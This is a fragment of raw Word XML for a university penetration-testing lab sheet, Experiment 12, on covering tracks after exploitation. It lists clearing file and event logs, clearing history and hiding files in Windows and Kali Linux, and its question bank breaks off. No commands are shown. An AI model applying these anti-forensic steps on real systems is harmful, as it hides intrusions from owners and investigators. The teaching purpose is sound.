              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A759B86" w14:textId="17EE936E" w:rsidR="003446D6" w:rsidRDefault="00A65E11" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="369A9CCE" wp14:editId="56D88726">
            <wp:extent cx="5943600" cy="3448050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1428240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078" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId162"/>
                    <a:srcRect r="30021"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3448050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="789D47E5" w14:textId="355A6390" w:rsidR="008A7FCD" w:rsidRDefault="008A7FCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6234BAAC" w14:textId="77777777" w:rsidR="00B17B8E" w:rsidRDefault="00B17B8E" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="071AE361" w14:textId="422D62D1" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00CA2DAB" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EXPERIMENT NO. 1</w:t>
      </w:r>
      <w:r w:rsidR="00E40D19">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (VALUE ADDED EXPERIMEN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03FC8" w:rsidRPr="001C411D" w14:paraId="591A6C68" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BE4D28A" w14:textId="4220DFBB"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Student Name and Roll Number: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B856FAF" w14:textId="77777777" w:rsidR="00B03FC8" w:rsidRPr="001C411D" w:rsidRDefault="00B03FC8" w:rsidP="00B03FC8">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03FC8" w:rsidRPr="001C411D" w14:paraId="1CEB1BE5" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="346DB31A" w14:textId="6DA66837"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Semester /Section</w:t>
            </w:r>
            <w:r w:rsidR="002F4EF1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A424F5B" w14:textId="77777777" w:rsidR="00B03FC8" w:rsidRPr="001C411D" w:rsidRDefault="00B03FC8" w:rsidP="00B03FC8">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03FC8" w:rsidRPr="001C411D" w14:paraId="762B34F4" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F7CC469" w14:textId="77777777"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Link to Code:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="640385A7" w14:textId="77777777" w:rsidR="00B03FC8" w:rsidRPr="001C411D" w:rsidRDefault="00B03FC8" w:rsidP="00B03FC8">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03FC8" w:rsidRPr="001C411D" w14:paraId="200308D9" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F62E549" w14:textId="15C6CA00"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 xml:space="preserve">Date: </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03FC8" w:rsidRPr="001C411D" w14:paraId="587CF73A" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06402DD5" w14:textId="77777777"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Faculty Signature:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="191868E6" w14:textId="77777777" w:rsidR="00B03FC8" w:rsidRPr="001C411D" w:rsidRDefault="00B03FC8" w:rsidP="00B03FC8">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03FC8" w:rsidRPr="001C411D" w14:paraId="3C4E0CE5" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="672AF0F6" w14:textId="77777777" w:rsidR="00B03FC8" w:rsidRPr="001C411D" w:rsidRDefault="00B03FC8" w:rsidP="00B03FC8">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Marks:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16C5C61D" w14:textId="77777777" w:rsidR="00B03FC8" w:rsidRPr="001C411D" w:rsidRDefault="00B03FC8" w:rsidP="00B03FC8">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1951762D" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>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90352" w:rsidRPr="001C411D" w14:paraId="5A8F0976" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="652F4CAD"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bjective:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="629D68C1" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BC8A122" w14:textId="77777777" w:rsidR="00CA2DAB" w:rsidRPr="001C411D" w:rsidRDefault="00CA2DAB" w:rsidP="00CA2DAB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>To familiarize the students with the concept of Fifth phase of penetration testing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ADA7A34" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A90352" w:rsidRPr="001C411D" w14:paraId="197FE21C" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3C6AD559"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Outcome:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69879D3B" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="12A7E1D6" w14:textId="77777777" w:rsidR="00CA2DAB" w:rsidRPr="001C411D" w:rsidRDefault="00CA2DAB" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">The students will be able to Cover tracks and post exploit the target machine </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D8F9CD1" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A90352" w:rsidRPr="001C411D" w14:paraId="4D88764A" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A11FA07"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Problem Statement:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EB1BEAC" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="03ECCE6A" w14:textId="77777777" w:rsidR="00CA2DAB" w:rsidRPr="001C411D" w:rsidRDefault="00CA2DAB" w:rsidP="00CA2DAB">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Perform steps to remove the tracks in windows and Kali Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EB76AC9" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A90352" w:rsidRPr="001C411D" w14:paraId="1B4FF125" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="072EC37D"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Background Study:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="280E3448" w14:textId="77777777" w:rsidR="00CA2DAB" w:rsidRPr="001C411D" w:rsidRDefault="00CA2DAB" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>In the phases previous to this one the pen tester successfull</w:t>
            </w:r>
            <w:r w:rsidR="00156CCA" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">y managed to avoid detection by </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">firewalls and intrusion detection systems, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43F86587" w14:textId="77777777" w:rsidR="00CA2DAB" w:rsidRPr="001C411D" w:rsidRDefault="00156CCA" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:after="150" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidR="00CA2DAB" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>he purpose of this phase is to cover up all the little clues that would give away the nature of his deeds.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B5BCECD" w14:textId="77777777" w:rsidR="00CA2DAB" w:rsidRPr="001C411D" w:rsidRDefault="00CA2DAB" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:after="150" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>There are few ways that we can cover our tracks, making it VERY difficult to track our malicious activities.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C195161" w14:textId="77777777" w:rsidR="00156CCA" w:rsidRPr="001C411D" w:rsidRDefault="00CA2DAB" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:after="150" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Clear the File, events logs or clear history </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7253FE4E" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00CA2DAB" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:after="150" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hide the Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A90352" w:rsidRPr="001C411D" w14:paraId="02F10C47" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64E2E730" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Question Bank:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FCC18F7" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="03E6B797" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00222427" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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hat is pivoting?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="451DD912" w14:textId="77777777" w:rsidR="00222427" w:rsidRPr="001C411D" w:rsidRDefault="00222427" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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the use of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
